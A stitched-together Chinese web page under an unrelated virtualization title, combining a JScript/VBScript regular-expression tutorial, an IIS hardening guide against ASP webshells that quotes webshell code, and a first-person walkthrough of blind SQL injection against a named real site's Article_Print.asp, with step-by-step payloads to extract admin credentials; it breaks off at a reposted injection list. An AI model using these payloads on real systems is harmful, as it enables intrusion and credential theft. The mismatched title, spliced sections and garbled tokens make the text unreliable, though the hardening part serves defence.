基于开源Linux和Xen的虚拟化基础架构

   •测试字符串的某个模式。例如，可以对一个输入字符串进行测试，看在该字符串是否存在一个电话号码模式或一个信用卡号码模式。这称为数据有效性验证。

   •替换文本。可以在文档中使用一个正则表达式来标识特定文字，然后可以全部将其删除，或者替换为别的文字。

   •根据模式匹配从字符串中提取一个子字符串。可以用来在文本或输入字段中查找特定文字。

   例如，如果需要搜索整个 web 站点来删除某些过时的材料并替换某些HTML 格式化标记，则可以使用正则表达式对每个文件进行测试，看在该文件中是否存在所要查找的材料或 HTML 格式化标记。用这个方法，就可以将受影响的文件范围缩小到包含要删除或更改的材料的那些文件。然后可以使用正则表达式来删除过时的材料，最后，可以再次使 用正则表达式来查找并替换那些需要替换的标记。

   另一个说明正则表达式非常有用的示例是一种其字符串处理能力还不为人所知的语言。VBScript 是 Visual Basic 的一个子集，具有丰富的字符串处理功能。与 C 类似的 Jscript 则没有这一能力。正则表达式给 JScript 的字符串处理能力带来了明显改善。不过，可能还是在 VBScript 中使用正则表达式的效率更高，它允许在单个表达式中执行多个字符串操作。

   正则表达式语法

   一个正则表达式就是由普通字符（例如字符 a 到 z）以及特殊字符（称为元字符）组成的文字模式。该模式描述在查找文字主体时待匹配的一个或多个字符串。正则表达式作为一个模板，将某个字符模式与所搜索的字符串进行匹配。

   这里有一些可能会遇到的正则表达式示例：

建立正则表达式

   构造正则表达式的方法和创建数学表达式的方法一样。也就是用多种元字符与操作符将小的表达式结合在一起来创建更大的表达式。可以通过在一对分隔符之间放入 表达式模式的各种组件来构造一个正则表达式。对 JScript 而言，分隔符为一对正斜杠 (/) 字符。例如：/expression/。对 VBScript 而言，则采用一对引号 ("") 来确定正则表达式的边界。例如："expression"。

   在上面所示的两个示例中，正则表达式模式 (expression) 均存储在RegExp 对象的Pattern 属性中。正则表达式的组件可以是单个的字符、字符集合、字符范围、字符间的选择或者所有这些组件的任意组合。

   优先级顺序

   在构造正则表达式之后，就可以象数学表达式一样来求值，也就是说，可以从左至右并按照一个优先级顺序来求值。下表从最高优先级到最低优先级列出各种正则表达式操作符的优先级顺序：

操作符	描述
\	转义符
(), (?:), (?=), []	圆括号和方括号
*, +, ?, {n}, {n,}, {n,m}	限定符
^, $, \anymetacharacter	位置和顺序
|	“或”操作

   普通字符

   普通字符由所有那些未显式指定为元字符的打印和非打印字符组成。这包括所有的大写和小写字母字符，所有数字，所有标点符号以及一些符号。最简单的正则表达 式是一个单独的普通字符，可以匹配所搜索字符串中的该字符本身。例如，单字符模式 'A' 可以匹配所搜索字符串中任何位置出现的字母 'A'。这里有一些单字符正则表达式模式的示例：

/a/

/7/

/M/

等价的 VBScript 单字符正则表达式为：

"a"

"7"

"M"

   可以将多个单字符组合在一起得到一个较大的表达式。例如，下面的 JScript 正则表达式不是别的，就是通过组合单字符表达式 'a'、'7'以及 'M' 所创建出来的一个表达式。

/a7M/

   等价的 VBScript 表达式为："a7M"

   请注意这里没有连接操作符。所需要做的就是将一个字符放在了另一个字符后面。

   特殊字符

   有不少元字符在试图对其进行匹配时需要进行特殊的处理。要匹配这些特殊字符，必须首先将这些字符转义，也就是在前面使用一个反斜杠 (\)。下表给出了这些特殊字符及其含义：

特殊字符	说明
$	匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性，则 $ 也匹配 '\n' 或 '\r'。要匹配 $ 字符本身，请使用 \$。
( )	标记一个子表达式的开始和结束位置。子表达式可以获取供以后使用。要匹配这些字符，请使用 \( 和 \)。
*	匹配前面的子表达式零次或多次。要匹配 * 字符，请使用 \*。
+	匹配前面的子表达式一次或多次。要匹配 + 字符，请使用 \+。
.	匹配除换行符 \n之外的任何单字符。要匹配 .，请使用 \。
[	标记一个中括号表达式的开始。要匹配 [，请使用 \[。
?	匹配前面的子表达式零次或一次，或指明一个非贪婪限定符。要匹配 ? 字符，请使用 \?。
\	将下一个字符标记为或特殊字符、或原义字符、或向后引用、或八进制转义符。例如， 'n' 匹配字符 'n'。'\n' 匹配换行符。序列 '\\' 匹配 "\"，而 '\(' 则匹配 "("。
^	匹配输入字符串的开始位置，除非在方括号表达式中使用，此时它表示不接受该字符集合。要匹配 ^ 字符本身，请使用 \^。
{	标记限定符表达式的开始。要匹配 {，请使用 \{。
|	指明两项之间的一个选择。要匹配 |，请使用 \|。

   非打印字符

   有不少很有用的非打印字符，偶尔必须使用。下表显示了用来表示这些非打印字符的转义序列：

字符	含义
\cx	匹配由x指明的控制字符。例如， \cM 匹配一个 Control-M 或回车符。x 的值必须为 A-Z 或 a-z 之一。否则，将 c 视为一个原义的 'c' 字符。
\f	匹配一个换页符。等价于 \x0c 和 \cL。
\n	匹配一个换行符。等价于 \x0a 和 \cJ。
\r	匹配一个回车符。等价于 \x0d 和 \cM。
\s	匹配任何空白字符，包括空格、制表符、换页符等等。等价于 [ \f\n\r\t\v]。
\S	匹配任何非空白字符。等价于 [^ \f\n\r\t\v]。
\t	匹配一个制表符。等价于 \x09 和 \cI。
\v	匹配一个垂直制表符。等价于 \x0b 和 \cK。

   字符匹配

   句点 (.) 匹配一个字符串中任何单个的打印或非打印字符，除了换行符 (\n) 之外。下面的 JScript 正则表达式可以匹配 'aac'、'abc'、'acc'、'adc'如此等等，同样也可以匹配 'a1c'、'a2c'、a-c'以及 a#c'：

/a.c/等价的 VBScript 正则表达式为："a.c"

   如果试图匹配一个包含文件名的字符串，其中句点 (.) 是输入字符串的一部分，则可以在正则表达式中的句点前面加上一个反斜杠 (\) 字符来实现这一要求。举例来说，下面的 JScript 正则表达式就能匹配 'filename.ext'：

/filename\.ext/对 VBScript 而言，等价的表达式如下所示：

"filename\.ext"

    这些表达式仍然是相当有限的。它们只允许匹配任何单字符。很多情况下，对从列表中匹配特殊字符十分有用。例如，如果输入文字中包含用数字表示为Chapter 1, Chapter 2诸如此类的章节标题，你可能需要找到这些章节标题。

   括号表达式

   可以在一个方括号 ([ 和 ]) 中放入一个或多个单字符，来创建一个待匹配的列表。如果字符被放入括号中括起来，则该列表称为括号表达式。括号内和其他任何地方一样，普通字符代表其本身，也就是说，它们匹配输入文字中出现的一处自己。大多数特殊字符在位于括号表达式中时都将失去其含义。这里有一些例外：

• ']' 字符如果不是第一项，则将结束一个列表。要在列表中匹配 ']' 字符，请将其放在第一项，紧跟在开始的 '[' 后面。  
• '\' 仍然作为转义符。要匹配 '\' 字符，请使用 '\\'。

   括号表达式中所包含的字符只匹配该括号表达式在正则表达式中所处位置的一个单字符。下面的 JScript 正则表达式可以匹配 'Chapter 1'、'Chapter 2'、'Chapter 3'、'Chapter 4' 以及 'Chapter 5'：/Chapter [12345]/在 VBScript 中要匹配同样的章节标题，请使用下面的表达式："Chapter [12345]"

   请注意单词 'Chapter' 及后面的空格与括号内的字符的位置关系是固定的。

   因此，括号表达式只用来指定满足紧跟在单词 'Chapter' 和一个空格之后的单字符位置的字符集合。这里是第九个字符位置。

   如果希望使用范围而不是字符本身来表示待匹配的字符，则可以使用连字符将该范围的开始和结束字符分开。每个字符的字符值将决定其在一个范围内的相对顺序。下面的 JScript 正则表达式包含了一个等价于上面所示的括号列表的范围表达式。

/Chapter [1-5]/VBScript 中相同功能的表达式如下所示："Chapter [1-5]"

   如果以这种方式指定范围，则开始和结束值都包括在该范围内。有一点特别需要注意的是，在 Unicode 排序中起始值一定要在结束值之前。

   如果想在括号表达式中包括连字符，则必须使用下述方法之一：

• 使用反斜杠将其转义： [\-]  
• 将连字符放在括号列表的开始和结束位置。下面的表达式能匹配所有的小写字母和连字符： [-a-z]  [a-z-]  
• 创建一个范围，其中开始字符的值小于连字符，而结束字符的值等于或大于连字符。下面两个正则表达式都满足这一要求：[!--]  [!-~]

   同样，通过在列表开始处放置一个插入符(^)，就可以查找所有不在列表或范围中的字符。如果该插入符出现在列表的其他位置，则匹配其本身，没有任何特殊含义。下面的 JScript 正则表达式匹配章节号大于 5 的章节标题：

/Chapter [^12345]/对 VBScript 则使用："Chapter [^12345]"

   在上面所示的示例中，表达式将匹配第九个位置处除1, 2, 3, 4, or 5 之外的任何数字字符。因此， 'Chapter 7' 为一个匹配，同样 'Chapter 9' 也是如此。

   上面的表达式可以使用连字符 (-) 表示。对 JScript 为：/Chapter [^1-5]/或者，对 VBScript 为："Chapter [^1-5]"

括号表达式的典型用法是指定对任何大写或小写字母字符或任何数字的匹配。

   下面的 JScript 表达式给出了这一匹配：/[A-Za-z0-9]/等价的 VBScript 表达式为："[A-Za-z0-9]"

限定符

   有时候不知道要匹配多少字符。为了能适应这种不确定性，正则表达式支持限定符的概念。这些限定符可以指定正则表达式的一个给定组件必须要出现多少次才能满足匹配。

  下表给出了各种限定符及其含义的说明：

字符	描述
*	匹配前面的子表达式零次或多次。例如，zo* 能匹配 "z" 以及 "zoo"。* 等价于{0,}。
+	匹配前面的子表达式一次或多次。例如，'zo+' 能匹配 "zo" 以及 "zoo"，但不能匹配 "z"。+ 等价于 {1,}。
?	匹配前面的子表达式零次或一次。例如，"do(es)?" 可以匹配 "do" 或 "does" 中的"do" 。? 等价于 {0,1}。
{n}	n 是一个非负整数。匹配确定的 n 次。例如，'o{2}' 不能匹配 "Bob" 中的 'o'，但是能匹配 "food" 中的两个 o。
{n,}	n 是一个非负整数。至少匹配n 次。例如，'o{2,}' 不能匹配 "Bob" 中的 'o'，但能匹配 "foooood" 中的所有 o。'o{1,}' 等价于 'o+'。'o{0,}' 则等价于 'o*'。
{n,m}	m 和 n 均为非负整数，其中n ＜= m。最少匹配 n 次且最多匹配 m 次。例如，"o{1,3}" 将匹配 "fooooood" 中的前三个 o。'o{0,1}' 等价于 'o?'。请注意在逗号和两个数之间不能有空格。

   对一个很大的输入文档而言，章节数很轻易就超过九章，因此需要有一种方法来处理两位数或者三位数的章节号。限定符就提供了这个功能。下面的JScript 正则表达式可以匹配具有任何位数的章节标题：

/Chapter [1-9][0-9]*/下面的 VBScript 正则表达式执行同样的匹配："Chapter [1-9][0-9]*"

   请注意限定符出现在范围表达式之后。因此，它将应用于所包含的整个范围表达式，在本例中，只指定了从 0 到 9 的数字。

   这里没有使用 '+' 限定符，因为第二位或后续位置上并不一定需要一个数字。同样也没有使用 '?' 字符，因为这将把章节数限制为只有两位数字。在 'Chapter' 和空格字符之后至少要匹配一个数字。

   如果已知章节数限制只有99 章，则可以使用下面的 JScript 表达式来指定至少有一位数字，但不超过两个数字。

/Chapter [0-9]{1,2}/对 VBScript 可以使用下述正则表达式："Chapter [0-9]{1,2}"

   上述表达式的缺点是如果有一个章节号大于 99，它仍只会匹配前两位数字。另一个缺点是某些人可以创建一个 Chapter 0，而且仍能匹配。一个更好的用来匹配两位数的 JScript 表达式如下：

/Chapter [1-9][0-9]?/或者/Chapter [1-9][0-9]{0,1}/

对 VBScript 而言，下述表达式与上面等价：

"Chapter [1-9][0-9]?"或者"Chapter [1-9][0-9]{0,1}"

'*'、'+' 和 '?' 限定符都称之为贪婪的，也就是说，他们尽可能多地匹配文字。有时这根本就不是所希望发生的情况。有时则正好希望最小匹配。

   例如，你可能要搜索一个 HTML 文档来查找一处包含在 H1 标记中的章节标题。在文档中该文字可能具有如下形式：

＜H1＞Chapter 1 – Introduction to Regular Expressions＜/H1＞

   下面的表达式匹配从开始的小于号 (＜) 到 H1 标记结束处的大于号之间的所有内容。

/＜.*＞/VBScript 的正则表达式为"＜.*＞"

   如果所要匹配的就是开始的 H1 标记，则下述非贪婪地表达式就只匹配。

/＜.*?＞/或者"＜.*?＞"

   通过在 '*'、 '+' 或 '?' 限定符后放置 '?'，该表达式就从贪婪匹配转为了非贪婪或最小匹配。

   定位符

   到现在为止，所看到的示例都只考虑查找任何地方出现的章节标题。出现的任何一个字符串 'Chapter' 后跟一个空格和一个数字可能是一个真正的章节标题，也可能是对其他章节的交叉引用。由于真正的章节标题总是出现在一行的开始，因此需要设计一个方法只查找 标题而不查找交叉引用。

   定位符提供了这个功能。定位符可以将一个正则表达式固定在一行的开始或结束。也可以创建只在单词内或只在单词的开始或结尾处出现的正则表达式。下表包含了正则表达式及其含义的列表：

字符	描述
^	匹配输入字符串的开始位置。如果设置了 RegExp 对象的 Multiline 属性，^ 也匹配 '\n' 或 '\r' 之后的位置。
$	匹配输入字符串的结束位置。如果设置了RegExp 对象的 Multiline 属性，$ 也匹配 '\n' 或 '\r' 之前的位置。
\b	匹配一个单词边界，也就是指单词和空格间的位置。
\B	匹配非单词边界。

   不能对定位符使用限定符。因为在一个换行符或者单词边界的前面或后面不会有连续多个位置，因此诸如 '^*' 的表达式是不允许的。

   要匹配一行文字开始位置的文字，请在正则表达式的开始处使用 '^' 字符。不要把 '^' 的这个语法与其在括号表达式中的语法弄混。它们的语法根本不同。

   要匹配一行文字结束位置的文字，请在正则表达式的结束处使用 '$' 字符。

   要在查找章节标题时使用定位符，下面的 JScript 正则表达式将匹配位于一行的开始处最多有两个数字的章节标题：

  /^Chapter [1-9][0-9]{0,1}/VBScript 中相同功能的正则表达式如"^Chapter [1-9][0-9]{0,1}"

  一个真正的章节标题不仅出现在一行的开始，而且这一行中也仅有这一个内容，因此，它必然也位于一行的结束。下面的表达式确保所指定的匹配只匹配章节而不会匹配交叉引用。它是通过创建一个只匹配一行文字的开始和结束位置的正则表达式来实现的。

/^Chapter [1-9][0-9]{0,1}$/对 VBScript 则使用"^Chapter [1-9][0-9]{0,1}___FCKpd___4quot;

   匹配单词边界有少许不同，但却给正则表达式增加了一个非常重要的功能。单词边界就是单词和空格之间的位置。非单词边界就是其他任何位置。下面的 JScript 表达式将匹配单词 'Chapter' 的前三个字符，因为它们出现在单词边界后/\bCha/对 VBScript 为"\bCha"

   这里 '\b' 操作符的位置很关键。如果它位于要匹配的字符串的开始，则将查找位于单词开头处的匹配；如果它位于改字符串的末尾，则查找位于单词结束处的匹配。例如，下 面的表达式将匹配单词 'Chapter' 中的 'ter'，因为它出现在单词边界之前/ter\b/以及"ter\b"

   下面的表达式将匹配 'apt'，因为它位于 'Chapter' 中间，但不会匹配 'aptitude' 中的'apt'：/\Bapt/以及"\Bapt"

   这是因为在单词 'Chapter' 中 'apt' 出现在非单词边界位置，而在单词 'aptitude' 中位于单词边界位置。非单词边界操作符的位置不重要，因为匹配与一个单词的开头或结尾无关。

   选择与编组

   选择允许使用 '|' 字符来在两个或多个候选项中进行选择。通过扩展章节标题的正则表达式，可以将其扩充为不仅仅适用于章节标题的表达式。不过，这可没有想象的那么直接。在使 用选择时，将匹配'|' 字符每边最可能的表达式。你可能认为下面的 JScript 和 VBScript 表达式将匹配位于一行的开始和结束位置且后跟一个或两个数字的 'Chapter' 或 'Section'：

/^Chapter|Section [1-9][0-9]{0,1}$/

"^Chapter|Section [1-9][0-9]{0,1}$"

   不幸的是，真正的情况是上面所示的正则表达式要么匹配位于一行开始处的单词 'Chapter'，要么匹配一行结束处的后跟任何数字的 'Section'。如果输入字符串为 'Chapter 22'，上面的表达式将只匹配单词 'Chapter'。如果输入字符串为 'Section 22'，则该表达式将匹配 'Section 22'。但这种结果不是我们此处的目的，因此必须有一种办法来使正则表达式对于所要做的更易于响应，而且确实也有这种方法。

   可以使用圆括号来限制选择的范围，也就是说明确该选择只适用于这两个单词 'Chapter' 和 'Section'。不过，圆括号同样也是难处理的，因为它们也用来创建子表达式，有些内容将在后面关于子表达式的部分介绍。通过采用上面所示的正则表达 式并在适当位置添加圆括号，就可以使该正则表达式既可以匹配 'Chapter 1'，也可以匹配 'Section 3'。

  下面的正则表达式使用圆括号将 'Chapter' 和 'Section' 组成一组，所以该表达式才能正确工作。对 JScript 为：

/^(Chapter|Section) [1-9][0-9]{0,1}$/对 VBScript 为"^(Chapter|Section) [1-9][0-9]{0,1}$"

   这些表达式工作正确，只是产生了一个有趣的副产品。在 'Chapter|Section' 两边放置圆括号建立了适当的编组，但也导致两个待匹配单词之一都被捕获供今后使用。由于在上面所示的表达式中只有一组圆括号，因此只能有一个捕获的 submatch。可以使用 VBScript 的Submatches 集合或者JScript 中RegExp 对象的 $1-$9 属性来引用这个子匹配。

   有时捕获一个子匹配是所希望的，有时则是不希望的。在说明所示的示例中，真正想做的就是使用圆括号对单词 'Chapter' 或 'Section' 之间的选择编组。并不希望在后面再引用该匹配。实际上，除非真的是需要捕获子匹配，否则请不要使用。由于不需要花时间和内存来存储那些子匹配，这种正则表 达式的效率将更高。

   可以在正则表达式模式圆括号内部的前面使用 '?:'来防止存储该匹配供今后使用。对上面所示正则表达式的下述修改提供了免除子匹配存储的相同功能。对 JScript：

/^(?:Chapter|Section) [1-9][0-9]{0,1}$/对 VBScript为"^(?:Chapter|Section) [1-9][0-9]{0,1}$"

   除了 '?:' 元字符，还有两个非捕获元字符用于称之为预查的匹配。一个为正向预查，用 ?= 表示， 在任何开始匹配圆括号内的正则表达式模式的位置来匹配搜索字符串。一个为负向预查，用 '?!' 表示，在任何开始不匹配该正则表达式模式的位置来匹配搜索字符串。

   例如，假定有一个包含引用有 Windows 3.1、Windows 95、Windows 98 以及 Windows NT 的文档。进一步假设需要更新该文档，方法是查找所有对 Windows 95、Windows 98 以及 Windows NT 的引用，并将这些引用更改为 Windows 2000。可以使用下面的 JScript 正则表达式，这是一个正向预查，来匹配 Windows 95、Windows 98 以及 Windows NT：

/Windows(?=95 |98 |NT )/

在 VBScript 要进行同样的匹配可以使用下述表达式：

"Windows(?=95 |98 |NT )"

找到一个匹配后，紧接匹配到的文字（而不包括预查中使用的字符）就开始对下一次匹配的搜索。例如，如果上面所示的表达式匹配到 'Windows 98'，则将从 'Windows' 而不是 '98' 之后继续查找。

  向后引用

  正则表达式一个最重要的特性就是将匹配成功的模式的某部分进行存储供以后使用这一能力。请回想一下，对一个正则表达式模式或部分模式两边添加圆括号将导致 这部分表达式存储到一个临时缓冲区中。可以使用非捕获元字符 '?:', '?=', or '?!' 来忽略对这部分正则表达式的保存。

  所捕获的每个子匹配都按照在正则表达式模式中从左至右所遇到的内容存储。存储子匹配的缓冲区编号从 1 开始，连续编号直至最大 99 个子表达式。每个缓冲区都可以使用 '\n' 访问，其中 n 为一个标识特定缓冲区的一位或两位十进制数。

向后引用一个最简单，最有用的应用是提供了确定文字中连续出现两个相同单词的位置的能力。请看下面的句子：

Is is the cost of of gasoline going up up?

   根据所写内容，上面的句子明显存在单词多次重复的问题。如果能有一种方法无需查找每个单词的重复现象就能修改该句子就好了。下面的 JScript 正则表达式使用一个子表达式就可以实现这一功能。

/\b([a-z]+) \1\b/gi

等价的 VBScript 表达式为：

"\b([a-z]+) \1\b"

   在这个示例中，子表达式就是圆括号之间的每一项。所捕获的表达式包括一个或多个字母字符，即由'[a-z]+' 所指定的。该正则表达式的第二部分是对前面所捕获的子匹配的引用，也就是由附加表达式所匹配的第二次出现的单词。'\1'用来指定第一个子匹配。单词边界 元字符确保只检测单独的单词。如果不这样，则诸如 "is issued" 或 "this is" 这样的短语都会被该表达式不正确地识别。

   在 JScript 表达式中，正则表达式后面的全局标志 ('g') 表示该表达式将用来在输入字符串中查找尽可能多的匹配。大小写敏感性由表达式结束处的大小写敏感性标记 ('i') 指定。多行标记指定可能出现在换行符的两端的潜在匹配。对 VBScript 而言，在表达式中不能设置各种标记，但必须使用 RegExp 对象的属性来显式设置。

   使用上面所示的正则表达式，下面的 JScript 代码可以使用子匹配信息，在一个文字字符串中将连续出现两次的相同单词替换为一个相同的单词：

var ss = "Is is the cost of of gasoline going up up?.\n";
var re = /\b([a-z]+) \1\b/gim;       //创建正则表达式样式。
var rv = ss.replace(re,"$1");   //用一个单词替代两个单词。

   最接近的等价 VBScript 代码如下：

Dim ss, re, rv
ss = "Is is the cost of of gasoline going up up?." & vbNewLine
Set re = New RegExp
re.Pattern = "\b([a-z]+) \1\b"
re.Global = True
re.IgnoreCase = True
re.MultiLine = True
rv = re.Replace(ss,"$1")

   请注意在 VBScript 代码中，全局、大小写敏感性以及多行标记都是使用 RegExp 对象的适当属性来设置的。

   在replace 方法中使用 $1 来引用所保存的第一个子匹配。如果有多个子匹配，则可以用 $2, $3 等继续引用。

   向后引用的另一个用途是将一个通用资源指示符 (URI) 分解为组件部分。假定希望将下述的URI 分解为协议 (ftp, http, etc)，域名地址以及页面/路径：

http://msdn.microsoft.com:80/scripting/default.htm

下面的正则表达式可以提供这个功能。对 JScript，为：

/(\w+):\/\/([^/:]+)(:\d*)?([^# ]*)/

对 VBScript 为：

"(\w+):\/\/([^/:]+)(:\d*)?([^# ]*)"

   第一个附加子表达式是用来捕获该 web 地址的协议部分。该子表达式匹配位于一个冒号和两个正斜杠之前的任何单词。第二个附加子表达式捕获该地址的域名地址。该子表达式匹配不包括 '^'、 '/' 或 ':' 字符的任何字符序列。第三个附加子表达式捕获网站端口号码，如果指定了该端口号。该子表达式匹配后跟一个冒号的零或多个数字。最后，第四个附加子表达式捕 获由该 web 地址指定的路径以及\或者页面信息。该子表达式匹配一个和多个除'#' 或空格之外的字符。

   将该正则表达式应用于上面所示的 URI 后，子匹配包含下述内容：

• RegExp.$1 包含 "http"  
• RegExp.$2 包含 "msdn.microsoft.com"  
• RegExp.$3 包含 ":80"  
• RegExp.$4 包含 "/scripting/default.htm"

　　1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些？我们以海洋木马为列：

<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</object>
<object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
</object>
<object runat="server" id="net" scope="page" classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74">
</object>
<object runat="server" id="net" scope="page" classid="clsid:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B">
</object>
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228">
</object>

shellStr="Shell"
applicationStr="Application" 
if cmdPath="wscriptShell" 
set sa=server.createObject(shellStr&"."&applicationStr)
set streamT=server.createObject("adodb.stream")
set domainObject = GetObject("WinNT://.")

　　以上是海洋中的相关代码，从上面的代码我们不难看出一般ASP木马、Webshell主要利用了以下几类ASP组件：

　　① WScript.Shell (classid:72C24DD5-D70A-438B-8A42-98424B88AFB8)

　　② WScript.Shell.1 (classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)

　　③ WScript.Network (classid:093FF999-1EA0-4079-9525-9614C3504B74)

　　④ WScript.Network.1 (classid:093FF999-1EA0-4079-9525-9614C3504B74)

　　⑤ FileSystem Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)

　　⑥ Adodb.stream (classid:)

　　⑦ Shell.applicaiton....

　　hehe，这下我们清楚了危害我们WEB SERVER IIS的最罪魁祸首是谁了!!开始操刀,come on...

　　2:解决办法：

　　① 删除或更名以下危险的ASP组件：

　　WScript.Shell、WScript.Shell.1、Wscript.Network、Wscript.Network.1、adodb.stream、Shell.application

　　开始------->运行--------->Regedit，打开注册表编辑器，按Ctrl+F查找，依次输入以上 Wscript.Shell等组件名称以及相应的ClassID，然后进行删除或者更改名称(这里建议大家更名，如果有部分网页ASP程序利用了上面的组 件的话呢，只需在将写ASP代码的时候用我们更改后的组件名称即可正常使用。当然如果你确信你的ASP程序中没有用到以上组件，还是直

　　接删除心中踏实一些^_^,按常规一般来说是不会做到以上这些组件的。删除或更名后，iisreset重启IIS后即可升效。)

　　[注意：由于Adodb.Stream这个组件有很多网页中将用到，所以如果你的服务器是开虚拟主机的话，建议酢情处理。]

　　② 关于 File System Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)即常说的FSO的安全问题，如果您的服务器必需要用到 FSO的话，(部分虚拟主机服务器一般需开FSO功能)可以参照本人的另一篇关于FSO安全解决办法的文章:Microsoft Windows 2000 Server FSO 安全隐患解决办法。如果您确信不要用到的话，可以直接反注册此组件即可。

　　③ 直接反注册、卸载这些危险组件的方法：(实用于不想用①及②类此类烦琐的方法)

　　卸载wscript.shell对象，在cmd下或直接运行：regsvr32 /u %windir%system32WSHom.Ocx

　　卸载FSO对象,在cmd下或直接运行：regsvr32.exe /u %windir%system32scrrun.dll

　　卸载stream对象,在cmd下或直接运行： regsvr32 /s /u "C:Program FilesCommon FilesSystemadomsado15.dll"

　　如果想恢复的话只需要去掉 /U 即可重新再注册以上相关ASP组件例如：regsvr32.exe %windir%system32scrrun.dll

　　④ 关于Webshell中利用set domainObject = GetObject("WinNT://.")来获取服务器的进程、服务以及用户等信息的防范，大家可以将服务中的Workstation[提供网络链结 和通讯]即Lanmanworkstation服务停止并禁用即可。此处理后，Webshell显示进程处将为空白。

　　3 按照上1、2方法对ASP类危险组件进行处理后，用阿江的asp探针测试了一下,"服务器CPU详情"和"服务器操作系统"根本查不到,内容为空白的。再 用海洋测试Wsript.Shell来运行cmd命令也是提示Active无法创建对像。大家就都可以再也不要为ASP木马危害到服务器系统的安全而担扰 了。

　　当然服务器安全远远不至这些，这里为大家介绍的仅仅是本人在处理ASP木马、Webshell上的一些心得体会。在下一篇中将为大家介绍如何简 简单单的防止别人在服务器上执行如net user之类的命令，防溢出类攻击得到cmdshell，以及执行添加用户、改NTFS设置权限到终端登录等等的最简单有效的防范方法。

　　本文作者：李泊林/LeeBolin 资深系统工程师、专业网络安全顾问。 已成功为国内多家大中型企业，ISP服务商提供了完整的网络安全解决方案。尤其擅长于整体网络安全方案的设计、大型网络工程的策划、以及提供完整的各种服务器系列安全整体解决方案。

今天晚上没事，在网上闲逛，在华夏黑客同盟看到一个关于溢出serv-U的动画教程和文章，想把它down下来看看，于是

我找到下载页面，一看~~~~，想哭，它只给会员才可以下载的。不能吧，既然说下就一定要把他下下来。

于是我到处看看，他用的是动力的整站程序，拿出工具扫，什么都没扫到，整体上没有做太大的改动，

网上已经公布的漏洞，站长早已把它补上了。没办法，再找找别的吧，打开网站-打开一篇文章 在 地址栏中提

交 and 1=1 出现错误 看来Article_Show.asp文件已经做了过滤~接着，看到打印此文这个功能。点击，看到Article_Print.asp?Arti
cleID=4;
提交http://www.77169.com/Article_Print.asp?ArticleID=4'返回错误信息，

接着提交http://www.77169.com/Article_Print.asp?ArticleID=4;页面正常返回

再提交http://www.77169.com/Article_Print.asp?ArticleID=4 and 1=1 页面正常返回

和http://www.77169.com/Article_Print.asp?ArticleID=4 and 1=2 返回找不到该文章。看来怪狗没有没有注意到这个文件的问题哦！！
有了上面的条件基本上就可以断定这个页面存在SQL注入漏洞了（因为别的页面提交都返回错误信息）

下面我们就开始注入了，和别的SQL注入一样，
猜管理员帐号表
http://www.77169.com/Article_Print.asp?ArticleID=4 and exists (select * from admin)成功返回

我们再来猜他的管理员表中是否有一个ID段

http://www.77169.com/Article_Print.asp?ArticleID=4 and exists (select id from admin)

OK,页面返回正常,说明他的admin表中有个id的字段。

这里的意思是看看他的admin表中是否有username字段

页面返回正常,说明在admin中有一个username字段

我们继续猜他放密码的字段and exists (select password from admin)

返回正常的页面,说明他的admin表中有个password字段

好了,我们下面来猜他的管理员的id值and exists (select id from admin where id=1)

意思是看看他的admin表中是否有一个id=1的值

OK,返回了正常的页面,说明我们猜对了

有时候管理员的ID值不是1，那么我们可以把ID=的值换成别的，2，3，4，等等一直到页面正常返回为止。

下面我们来猜他的管理员的名字长度

and exists (select id from admin where len(username)<6 and id=1)

这里我们猜他的管理员长度小于6,呵呵,返回了正常的页面,还好,名字不是太长,

我们一个个来实验好了and exists (select id from admin where len(username)=5 and id=1)

返回了正常的页面,好了用户名的长度我们已经猜出了为5

下面我们来我们的重点任务-猜帐号

用户名字段长度
and 1=(select min(id)from admin where len(username)>5)

这是密码字段长
and 1=(select min(id)from admin where len(password)<10)

and 1=(select min(id)from admin where mid(username,1,1)='a')

破用户名！
and 1=(select id from admin where asc(mid(username,1,1))>120)
ID=2
and 2=(select id from admin where id=2 and asc(mid(username,1,1))>120)

把MID部分改就行！

right(user,2)表示从右边开始的两个字符。
left(user,2)表示从左边开始的两个字符！

所以你先用left(user,1)='c'得到第一位，那就left(user,2)='ca'

我们再来猜他的密码的asc值

and 1=(select min(id)from admin where len(password)<10)返回错误
and 1=(select min(id)from admin where len(password)=16)正常返回页面，到这里我就有点高兴不起来了，因为很有可能管理员
的密码是md5加密的。

如果密码是数字的话还好办，用工具暴力破解几分钟就可以破出来，但是如果是数字加字母的呢？放心不要紧，MD5我们照样破别管那
些，继续破。

我快累死了，终于把管理员的用户名和密码都破出来了，用户名：admin 密码：ad901c854c52987b 。

每错，果然是MD5加密的。

有些人看到MD5加密的可能就会拿出暴力破解软件慢慢的破解，包括我自己也是这样，如果过了20分钟密码还没有出来的话，那么

我就不会用这个方法了，如果是数字的话，早就出来了，字母就难了，找个肉鸡挂上扫几天也许有结果。

当天晚上我就把这个漏洞用QQ通知了华夏站长,没想到他居然告诉我说"那个admin帐号是他故意加的,没有权限"

不过能有几个站长会这样做啊，(我自己的站就没有过滤,马上把打印页面del)

现在80%的动网和动力系统都存在打印页面SQL注入的漏洞,希望各站站长注意.

在看到动力系统的漏洞以后，我就想看看动网文章系统是否也存在同样的漏洞。

于是就到网上随便搜索一下，（KAO出来一大堆）随便找一个测试一下，结果让我大吃一惊。

下面是关于动网文章系统的打印页面的漏洞。

其实动网文章系统和动网和动力一样。不过动网文章系统比动力系统危险多了。

动力的密码是经过MD5加密的，而动网文章系统的密码是明文显示的。

动网文章系统存在漏洞的页面是/printpage.asp ，也是打印页面的漏洞，

入侵方法和动网和动力系统一样。

这篇文章主要是为了提醒那些网站的管理员，一定要了解自己的站。

把不要的东西，能删的全给它删了，我自己的站就是动力系统的，不过打印页面我早已经把它删了。

总的来说动力文章系统还是比较安全的，

相对的动网文章就有点危险了......

~︶︶~︶︶~︶︶~︶︶~︶︶~︶︶~︶︶~︶︶~︶︶~︶︶~文章结束

下面是转别人的SQL注入必殺技成功條件：
{{{
1.找到注入點
